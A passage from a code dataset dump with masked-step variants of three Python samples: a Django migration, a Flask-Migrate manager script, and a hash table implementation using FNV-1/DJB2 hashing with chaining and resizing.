code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('Registration', '0015_auto_20150525_1815')]
operations = [migrations.AlterField(model_name='user', name=
'created_date', field=models.DateField(auto_now_add=True)),
migrations.AlterField(model_name='user', name='last_login', field=
models.DateTimeField(null=True, verbose_name='last login', blank=
True)), migrations.AlterField(model_name='user', name=
'modified_date', field=models.DateField(auto_now=True)), migrations
.AlterField(model_name='user_skills', name='percentage', field=
models.PositiveSmallIntegerField(default=0, validators=[django.core
.validators.MinValueValidator(0), django.core.validators.
MaxValueValidator(100)]))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [('Registration', '0015_auto_20150525_1815')]
operations = [migrations.AlterField(model_name='user', name=
'created_date', field=models.DateField(auto_now_add=True)),
migrations.AlterField(model_name='user', name='last_login', field=
models.DateTimeField(null=True, verbose_name='last login', blank=
True)), migrations.AlterField(model_name='user', name=
'modified_date', field=models.DateField(auto_now=True)), migrations
.AlterField(model_name='user_skills', name='percentage', field=
models.PositiveSmallIntegerField(default=0, validators=[django.core
.validators.MinValueValidator(0), django.core.validators.
MaxValueValidator(100)]))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('Registration', '0015_auto_20150525_1815'),
]
operations = [
migrations.AlterField(
model_name='user',
name='created_date',
field=models.DateField(auto_now_add=True),
),
migrations.AlterField(
model_name='user',
name='last_login',
field=models.DateTimeField(null=True, verbose_name='last login', blank=True),
),
migrations.AlterField(
model_name='user',
name='modified_date',
field=models.DateField(auto_now=True),
),
migrations.AlterField(
model_name='user_skills',
name='percentage',
field=models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),
),
]
|
flexible
|
{
"blob_id": "7a1be5c9c48413ba1969631e99ecb45cf15ef613",
"index": 559,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('Registration', '0015_auto_20150525_1815')]\n operations = [migrations.AlterField(model_name='user', name=\n 'created_date', field=models.DateField(auto_now_add=True)),\n migrations.AlterField(model_name='user', name='last_login', field=\n models.DateTimeField(null=True, verbose_name='last login', blank=\n True)), migrations.AlterField(model_name='user', name=\n 'modified_date', field=models.DateField(auto_now=True)), migrations\n .AlterField(model_name='user_skills', name='percentage', field=\n models.PositiveSmallIntegerField(default=0, validators=[django.core\n .validators.MinValueValidator(0), django.core.validators.\n MaxValueValidator(100)]))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n dependencies = [('Registration', '0015_auto_20150525_1815')]\n operations = [migrations.AlterField(model_name='user', name=\n 'created_date', field=models.DateField(auto_now_add=True)),\n migrations.AlterField(model_name='user', name='last_login', field=\n models.DateTimeField(null=True, verbose_name='last login', blank=\n True)), migrations.AlterField(model_name='user', name=\n 'modified_date', field=models.DateField(auto_now=True)), migrations\n .AlterField(model_name='user_skills', name='percentage', field=\n models.PositiveSmallIntegerField(default=0, validators=[django.core\n .validators.MinValueValidator(0), django.core.validators.\n MaxValueValidator(100)]))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Registration', '0015_auto_20150525_1815'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_date',\n field=models.DateField(auto_now_add=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='last_login',\n field=models.DateTimeField(null=True, verbose_name='last login', blank=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='modified_date',\n field=models.DateField(auto_now=True),\n ),\n migrations.AlterField(\n model_name='user_skills',\n name='percentage',\n field=models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
'''
@Description: 数据库迁移
@Author: Zpp
@Date: 2020-03-30 11:01:56
@LastEditors: Zpp
@LastEditTime: 2020-04-28 09:55:26
'''
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(rootPath)
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from conf.setting import Config
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from models.salary import *
from models.system import *
from models.log import *
# 初始化 migrate
# 两个参数一个是 Flask 的 app,一个是数据库 db
migrate = Migrate(app, db)
# 初始化管理器
manager = Manager(app)
# 添加 db 命令,并与 MigrateCommand 绑定
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
normal
|
{
"blob_id": "69ebdab4cd1f0b5154305410381db252205ff97d",
"index": 9768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.append(rootPath)\n<mask token>\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-3": "<mask token>\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n<mask token>\nmigrate = Migrate(app, db)\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-4": "<mask token>\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom conf.setting import Config\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nfrom models.salary import *\nfrom models.system import *\nfrom models.log import *\nmigrate = Migrate(app, db)\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\nif __name__ == '__main__':\n manager.run()\n",
"step-5": "#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n'''\n@Description: 数据库迁移\n@Author: Zpp\n@Date: 2020-03-30 11:01:56\n@LastEditors: Zpp\n@LastEditTime: 2020-04-28 09:55:26\n'''\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom conf.setting import Config\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = Config().get_sql_url()\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nfrom models.salary import *\nfrom models.system import *\nfrom models.log import *\n\n# 初始化 migrate\n# 两个参数一个是 Flask 的 app,一个是数据库 db\nmigrate = Migrate(app, db)\n\n# 初始化管理器\nmanager = Manager(app)\n# 添加 db 命令,并与 MigrateCommand 绑定\nmanager.add_command('db', MigrateCommand)\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class HashTable:
<|reserved_special_token_0|>
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
<|reserved_special_token_0|>
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class HashTableEntry:
<|reserved_special_token_0|>
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class HashTableEntry:
"""
Hash Table entry, as a linked list node.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
hash = 14695981039346656037
for n in key.encode():
hash = hash ^ n
hash = hash * 1099511628211
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
hash = hash * 33 + n
return hash
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if current and current.key == key:
if current == self.storage[hi]:
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print('WARNING: no key')
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
if self.storage[hi].next:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity * factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
def calculateLoad(self):
load = self.numberOfItems / len(self.storage)
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
if __name__ == '__main__':
ht = HashTable(2)
ht.put('line_1', '111')
ht.put('line_2', '222')
ht.put('line_3', '333')
ht.put('line_4', 'sss')
ht.put('line_5', 'ddd')
ht.put('line_6', 'ggg')
ht.put('line_7', 'hhh')
ht.put('line_12', 'jjj')
print('')
old_capacity = len(ht.storage)
ht.resize()
new_capacity = len(ht.storage)
print(f'\nResized from {old_capacity} to {new_capacity}.\n')
print('')
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print('')
ht.delete('line_3')
print('')
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print('')
print('')
<|reserved_special_token_1|>
class HashTableEntry:
"""
Hash Table entry, as a linked list node.
"""
def __init__(self, key, value):
self.key = key
self.value = value
self.next = None
class HashTable:
"""
A hash table that with `capacity` buckets
that accepts string keys
Implement this.
"""
def __init__(self, capacity):
self.capacity = capacity
self.storage = [None] * capacity
self.numberOfItems = 0
def fnv1(self, key):
"""
FNV-1 64-bit hash function
Implement this, and/or DJB2.
"""
# hash = 0xff
hash = 0xcbf29ce484222325
for n in key.encode():
# print(n)
hash = hash ^ n
hash = hash * 0x100000001b3
# print(hash)
return hash
def djb2(self, key):
"""
DJB2 32-bit hash function
Implement this, and/or FNV-1.
"""
hash = 5381
for n in key.encode():
# hash = ((hash << 5) + hash) + n
hash = hash * 33 + n
return hash
# return hash & 0xFFFFFFFF
def hash_index(self, key):
"""
Take an arbitrary key and return a valid integer index
between within the storage capacity of the hash table.
"""
# return self.fnv1(key) % self.capacity
return self.djb2(key) % self.capacity
def put(self, key, value):
"""
Store the value with the given key.
Hash collisions should be handled with Linked List Chaining.
Implement this.
"""
hi = self.hash_index(key)
if self.storage[hi]:
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
if current.key == key:
current.value = value
else:
current.next = HashTableEntry(key, value)
self.numberOfItems += 1
else:
self.storage[hi] = HashTableEntry(key, value)
self.numberOfItems += 1
self.calculateLoad()
def delete(self, key):
"""
Remove the value stored with the given key.
Print a warning if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
# if that hi is empty ignore
# if self.storage[hi] is None:
# print("WARNING: no key")
# return
current = self.storage[hi]
prev = self.storage[hi]
while current and current.key != key:
prev = current
current = current.next
if (current and current.key == key):
# if its the first link in the list
if (current == self.storage[hi]):
self.storage[hi] = current.next
else:
prev.next = current.next
self.numberOfItems -= 1
else:
print("WARNING: no key")
self.calculateLoad()
def get(self, key):
"""
Retrieve the value stored with the given key.
Returns None if the key is not found.
Implement this.
"""
hi = self.hash_index(key)
if (self.storage[hi]):
if(self.storage[hi].next):
current = self.storage[hi]
while current.next and current.key != key:
current = current.next
return current.value
else:
return self.storage[hi].value
return None
def resize(self, factor=2):
"""
Doubles the capacity of the hash table and
rehash all key/value pairs.
Implement this.
"""
self.capacity = round(self.capacity*factor)
newarr = [None] * self.capacity
for i, v in enumerate(self.storage):
while v:
hi = self.hash_index(v.key)
if newarr[hi]:
current = newarr[hi]
while current.next:
current = current.next
current.next = HashTableEntry(v.key, v.value)
else:
newarr[hi] = HashTableEntry(v.key, v.value)
v = v.next
self.storage = newarr
# Solution 2 - Much cleaner
# newHashTable = HashTable(round(self.capacity*factor))
# for i, v in enumerate(self.storage):
# while v:
# newHashTable.put(v.key, v.value)
# v = v.next
# self.capacity = newHashTable.capacity
# self.storage = newHashTable.storage
def calculateLoad(self):
load = self.numberOfItems/len(self.storage)
# print("Items:\t", ht.numberOfItems)
# print("Storage:", len(ht.storage))
# print("LOAD:\t", load)
# comment code bellow to pass tests
if load > 0.7:
self.resize(2)
elif load < 0.2:
self.resize(0.5)
pass
if __name__ == "__main__":
ht = HashTable(2)
ht.put("line_1", "111")
ht.put("line_2", "222")
ht.put("line_3", "333")
ht.put("line_4", "sss")
ht.put("line_5", "ddd")
ht.put("line_6", "ggg")
ht.put("line_7", "hhh")
ht.put("line_12", "jjj")
print("")
# Test storing beyond capacity
# print(ht.get("line_1"))
# print(ht.get("line_2"))
# print(ht.get("line_3"))
# print(ht.get("line_4"))
# print(ht.get("line_5"))
# print(ht.get("line_6"))
# print(ht.get("line_7"))
# Test resizing
old_capacity = len(ht.storage)
ht.resize()
new_capacity = len(ht.storage)
print(f"\nResized from {old_capacity} to {new_capacity}.\n")
# print("1: ", ht.storage[1].value)
# print("1: ", ht.storage[1].next.value)
# print("3: ", ht.storage[3].value)
# print("3: ", ht.storage[3].next.value)
# print("3: ", ht.storage[3].next.next.value)
print("")
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print("")
ht.delete("line_3")
print("")
for i, v in enumerate(ht.storage):
while v:
print(i, v.value)
v = v.next
print("")
# Test if data intact after resizing
# print(ht.get("line_1"))
# print(ht.get("line_2"))
# print(ht.get("line_3"))
# print(ht.get("line_4"))
# print(ht.get("line_5"))
# print(ht.get("line_6"))
# print(ht.get("line_7"))
print("")
|
flexible
|
{
"blob_id": "7e58fe636e6d835d7857a49900bbc127b52f63d9",
"index": 6112,
"step-1": "<mask token>\n\n\nclass HashTable:\n <mask token>\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n <mask token>\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n <mask token>\n <mask token>\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\n<mask token>\n",
"step-3": "class HashTableEntry:\n <mask token>\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\n<mask token>\n",
